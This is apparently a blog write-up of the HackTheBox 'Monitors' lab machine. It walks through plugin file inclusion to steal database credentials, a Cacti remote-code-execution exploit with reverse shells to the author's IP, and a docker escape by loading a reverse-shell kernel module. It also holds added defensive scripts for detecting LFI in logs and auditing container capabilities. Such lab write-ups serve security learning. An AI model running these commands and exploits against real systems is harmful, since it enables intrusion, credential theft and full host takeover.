Monitors Walkthrough – Hackthebox – Writeup


Monitors is an active machine from Hackthebox. So, unless you are extremely desperate to capture the flag, don’t proceed to the walkthrough. Also, I will try to shorten the walkthrough as much as possible.

Note: Writing public writeups for active machines is against the rules of HTB. Otherwise, I could have protected this blog post using the root flag. Also, I couldn’t find a content locker for WordPress that allows a custom message, so I couldn’t password-protect this blog post using other methods like the root hash, the contents of a root-only readable file, etc.

Walkthrough of spectra from hackthebox

Firstly, let’s remove the default route added by the VPN server.

sudo route del -net default gw 10.10.14.1 netmask 0.0.0.0 dev tun0

Nmap scan

nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 10.10.10.238 

Enumerate web server

From the nmap results, we have an HTTP server to enumerate.

Direct access by IP isn’t available. So, I added monitors.htb to the /etc/hosts file.

Upon opening the site with the host name, we get a WordPress website.

Hence, I used wpscan to find vulnerable plugins.

wpscan --api-token $WPSCAN_KEY --url http://monitors.htb/ --plugins-detection mixed -e -o wpscan.log
cat wpscan.log

We got an unauthenticated file inclusion vulnerability in the wp spritz plugin. Thus, I opened the links provided and also started the Burp Suite proxy to move further. Then, I caught the request and sent it to Intruder and Repeater.

As we can see, the LFI worked. Since the plugin uses the file_get_contents function, we cannot execute remote PHP code. So, I decided to get credentials from the machine. Hence, I looked for the WordPress configuration file.
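An LFI like the one above leaves a clear trace in the web server’s access log: plugin requests whose parameter values carry traversal sequences, absolute system paths or wp-config.php. The following detection script is an added example and not part of the original post; the plugin path, parameter name and log lines are constructed, not taken from the real plugin.

```python
"""Flag WordPress plugin requests whose parameters look like local file inclusion."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache combined log format; only the fields this check needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# Values that a WordPress plugin parameter should never legitimately carry.
SUSPICIOUS = [
    re.compile(r"(\.\./|\.\.\\)"),              # directory traversal
    re.compile(r"^/(etc|proc|var|usr)/"),        # absolute system paths
    re.compile(r"wp-config\.php"),               # WordPress secrets
    re.compile(r"^(php|file|data)://", re.I),    # stream wrappers
]

def suspicious_params(target):
    """Return {param: value} for query values matching an LFI pattern on a plugin URL."""
    parts = urlsplit(target)
    if "/wp-content/plugins/" not in parts.path:
        return {}
    hits = {}
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote(unquote(value))  # also catch double-encoded traversal
            if any(p.search(decoded) for p in SUSPICIOUS):
                hits[name] = decoded
    return hits

def scan_log(lines):
    """Yield (client_ip, status, param, value) for each suspicious request."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in suspicious_params(m["target"]).items():
            yield (m["ip"], int(m["status"]), name, value)

# Constructed sample log lines (hypothetical plugin path, not the real one).
SAMPLE_LOG = [
    '10.10.14.60 - - [20/Apr/2021:10:01:02 +0000] "GET /wp-content/plugins/example-plugin/render.php?url=../../../../wp-config.php HTTP/1.1" 200 3211',
    '10.10.14.60 - - [20/Apr/2021:10:01:09 +0000] "GET /wp-content/plugins/example-plugin/render.php?url=/etc/apache2/sites-enabled/000-default.conf HTTP/1.1" 200 1402',
    '10.10.10.5 - - [20/Apr/2021:10:02:00 +0000] "GET /wp-content/plugins/example-plugin/render.php?url=https%3A%2F%2Fexample.com%2Fpost HTTP/1.1" 200 980',
    '10.10.10.5 - - [20/Apr/2021:10:02:30 +0000] "GET /index.php?p=../../etc/passwd HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Only the two plugin requests that read wp-config.php and the Apache site configuration are reported; the legitimate remote URL and the non-plugin request are ignored.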

I noted down the MySQL username and password. I also tried the password to log in as the WordPress admin and to SSH in as marcus, but didn’t succeed. Hence, I decided to check the Apache configuration.

Reference: https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/file-inclusion/lfi-linux-list.md

I fuzzed with the list above and found that the default site configuration file contains a comment with another hostname.

Hence, I added the hostname to my hosts file.

Using admin and the password I found earlier in the wp-config.php file gave me access to the service.

The version of the service is 1.2.12, which has an authenticated remote code execution exploit.

Reference: https://www.exploit-db.com/exploits/49810

nc -nlvp 4444

# On another tab
python3 exploit.py -t http://cacti-admin.monitors.htb -u admin -p <password> --lhost 10.10.14.60 --lport 4444

Finally, I got the foothold.

Get user’s shell

The first thing you want to do is make the shell interactive; otherwise, you are going to regret it later. I looked for some stuff manually but didn’t find anything. Hence, I decided to download Linux enumeration scripts like linpeas, LinEnum, pspy, etc. However, neither wget nor curl is installed on the target. Luckily, we have netcat on the machine. Hence, I listened as follows on my local machine.

nc -nlvp 5555 < linpeas.sh 

On the target, I did the following.

cd /tmp
nc 10.10.14.60 5555 > linpeas.sh

I repeated the same for the other binaries and ran the scripts. However, they didn’t give me anything. Then, I searched for all files owned by other users and didn’t find anything. However, when I looked at the home directory of marcus, there is a directory .backup with unusual permissions. So, I searched for the word marcus in files under directories that don’t contain binaries.

grep 'marcus' /etc -R 2>/dev/null

So, I looked at the contents of the file.

cat /home/marcus/.backup/backup.sh

I got a password that could give me SSH access as the user marcus.

Get root access

There is a note that refers to docker. So, I listed the listening ports.

Hence, I tunneled the port over SSH.

ssh -L 8443:127.0.0.1:8443 -R 4444:127.0.0.1:4444 -R 8080:127.0.0.1:8080 marcus@monitors.htb

This version has an exploit related to deserialization.

https://www.rapid7.com/db/modules/exploit/linux/http/apache_ofbiz_deserialiation/

Next, I used Python to spawn another reverse shell back to my local machine. That would allow me to make the shell more interactive using stty.

Now, we are inside the docker container. After this, we have to break out from the container to the host.

capsh --print

The capability cap_sys_module would allow us to break out from the container, because a process holding it can load kernel modules into the host kernel.

Reference: https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd
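The same finding can be checked from the defender’s side without capsh, by decoding the CapEff mask in /proc/<pid>/status and comparing it with the set Docker grants by default. This audit script is an added example, not code from the original post or the linked guide; the sample status text is constructed.

```python
"""Check a process's effective capabilities for container-escape-grade rights."""
import re

# Capability bit numbers from linux/capability.h; only the ones that matter
# for a host-escape review are listed here.
CAP_BITS = {
    "cap_dac_read_search": 2,
    "cap_net_admin": 12,
    "cap_sys_module": 16,
    "cap_sys_rawio": 17,
    "cap_sys_ptrace": 19,
    "cap_sys_admin": 21,
}

# Effective mask Docker grants by default (no --cap-add, no --privileged).
DOCKER_DEFAULT_CAPEFF = 0x00000000A80425FB

def decode_caps(mask):
    """Return the CAP_BITS names whose bit is set in the integer mask."""
    return {name for name, bit in CAP_BITS.items() if mask & (1 << bit)}

def parse_capeff(status_text):
    """Extract the CapEff hex mask from /proc/<pid>/status text, or None."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)", status_text, re.MULTILINE)
    return int(m.group(1), 16) if m else None

def audit_status(status_text):
    """Return (can_load_modules, caps beyond Docker's default) for the text."""
    mask = parse_capeff(status_text)
    if mask is None:
        raise ValueError("no CapEff line found")
    beyond_default = decode_caps(mask & ~DOCKER_DEFAULT_CAPEFF)
    return "cap_sys_module" in decode_caps(mask), beyond_default

# Constructed sample: the status of a shell in a container started with
# --cap-add SYS_MODULE (bit 16 set on top of the default mask).
SAMPLE_STATUS = "Name:\tbash\nCapInh:\t0000000000000000\nCapEff:\t00000000a80525fb\n"

if __name__ == "__main__":
    try:
        with open("/proc/self/status") as f:   # real process on Linux
            text = f.read()
    except OSError:
        text = SAMPLE_STATUS                    # fall back to the sample
    loadable, extra = audit_status(text)
    print("can load kernel modules:", loadable, "| caps beyond default:", sorted(extra))
```

Run it inside the container to confirm the capability, or over /proc/<pid>/status of the containerised process from the host.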

Following the guide, I copied the source code for the reverse shell. I changed the IP and the port so that I would listen on the host. To do that, I first copied the code to my local machine, edited it, and then copied it to the container’s ‘/’ path.

Then, I created the Makefile.

Then, I made the kernel module.

make

It didn’t work. So, I copied the two files to ‘/’ of the container. Then, I added the gcc library directory to the path.

mv reverse-shell.c /
mv Makefile /
cd /
export PATH=$PATH:/usr/lib/gcc/x86_64-linux-gnu/8/
make clean
make

It succeeded, and I could see some new files in the directory. Then, I listened on port 4445 of the host machine through the SSH login.

nc -nlvp 4445

Lastly, I executed the exploit on the docker container.

insmod reverse-shell.ko

This might not work because you might be working in a shared environment. So, reset your machine, repeat the steps, and voila.

I got the root shell from the monitors host.
